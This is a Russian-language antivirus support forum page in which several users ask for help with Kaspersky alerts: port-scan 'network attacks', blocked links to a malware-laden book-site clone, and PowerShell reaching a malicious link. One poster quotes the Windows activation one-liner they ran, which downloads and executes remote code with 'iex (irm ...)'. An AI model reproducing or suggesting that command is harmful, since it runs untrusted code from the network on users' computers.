[РЕШЕНО] Обнаружена ранее открытая вредоносная ссылка. Сетевая атака
-
Похожий контент
-
Автор xoti02
Здравствуйте. Сегодня столкнулся с таким, новым, лля меня явлением в Касперском, как "заблокирована сетевая атака". Честно, я не знаю откуда это и т.д. и т.п. Ноутбуком пользуюсь уже 4 года и даже, порой, скачивал игры с не самых надёжных сайтов, но подобное впервые. Могу, конечно, предположить, что это из-за игр (раз в год, как говориться) либо из-за "запрет лискорда и ютуба", либо из-за чего другого, но не знаю. Думал меня никогда не коснётся, но увы...
Каждые РОВНО 2 минуты(хотя 1 раз до этого поста и пару раз уже при нём было отставание ровно на 1 - 2 секунды) и вот уже пол часа получаю "Заблокирована сетевая атака", и мол название у неё "Scan.Generic.PortScan.UDP", причём с разных портов, но с одного МАС-адреса. При чём сам Касперский каких-то супер проблемных файлов не видит.
На сайте увидел, что было много пободных случаев, но я не понял особо в чём она заключается и как ее решить, ну и в целом насколько это опасно и т.д.
Честно, уже становится очень страшно, очень не по себе от этой ситуации. Не хочется расставаться с ноутбуком, так как он мне ещё требуется для учёбы и т.д. На всякий случай я уже конечно вышел отовсюду, откуда мог, кроме почт, но тем не менее...
Надеюсь на скорейшую помощь...
-
Автор Viacheslau T
Здравствуйте.
На днях знакомый прислал книгу которую я искал, но как оказалось, он ее скачал с сайта-клона flibusta.su который наполнен вирусами и майнерами.
Файл был открыт, но касперский вовремя его снес. Однако, видимо проблема прошла глубже.
При старте пк получаю уведомления от касперского(см 1 изобр.), что "Остановлен переход на сайт", но самого перехода от моего лица не происходит.
Перед созданием темы прогнал Dr.Web CureIt! и KVRM(2 и 3 изображ.). Первая утилита ничего не нашла, вторая выдала список ошибок обработки файлов, но возможно это связанно с тем, что эти приложения были активны.
Пока-что не собирал логи, т.к. не до конца понимаю, если я остановлю касперкий, скрипт подтянет майнер с вирусного сайта или нет?
Описание события:
```
Событие: Остановлен переход на сайт
Пользователь: DESKTOP-579T290\tsvirkovv
Тип пользователя: Инициатор
Имя приложения: MSPCManager.exe
Путь к приложению: C:\Program Files\WindowsApps\Microsoft.MicrosoftPCManager_3.17.10.0_x64__8wekyb3d8bbwe\PCManager
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: flibusta.su
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: flibusta.su
Причина: Базы
Дата выпуска баз: Вчера, 09.08.2025 15:47:00
Событие: Остановлен переход на сайт
Пользователь: DESKTOP-579T290\tsvirkovv
Тип пользователя: Инициатор
Имя приложения: MSPCManager.exe
Путь к приложению: C:\Program Files\WindowsApps\Microsoft.MicrosoftPCManager_3.17.10.0_x64__8wekyb3d8bbwe\PCManager
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: http://flibusta.su/favicon.ico
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: favicon.ico
Путь к объекту: http://flibusta.su
Причина: Базы
Дата выпуска баз: Вчера, 09.08.2025 15:47:00
```
Пожалуйста, сориентируйте порядок действий и проверок, которые нужно провести с минимальными рисками, т.к. не хотелось бы потерять систему.
-
Автор foroven
Добрый день. После того как мы словили вирус шифровальщик и был установлен антивирусный продукт лаборатории Касперского, в его журнале каждый час стали появляться записи о сетевой атаке. Причем адрес атакующего компьютера это Linux-система с установленным Kerio Control. Может ли Касперсий так реагировать на его работу? Или он может быть заражен? Спасибо.
-
Автор VanyeJ
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.
Событие: Остановлен переход на сайт
Пользователь: WIN-O4R3Q0UCBR5\User
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название:
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту:
Причина: Облачная защита
Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
CollectionLog-2025.02.08-15.48.zip
-
Автор mrTomny
Вопрос не решился? у меня такая же проблема вылезла....
инфо.txt
Сообщение от модератора Mark D. Pearlstone Перемещено из темы.
-

Рекомендуемые сообщения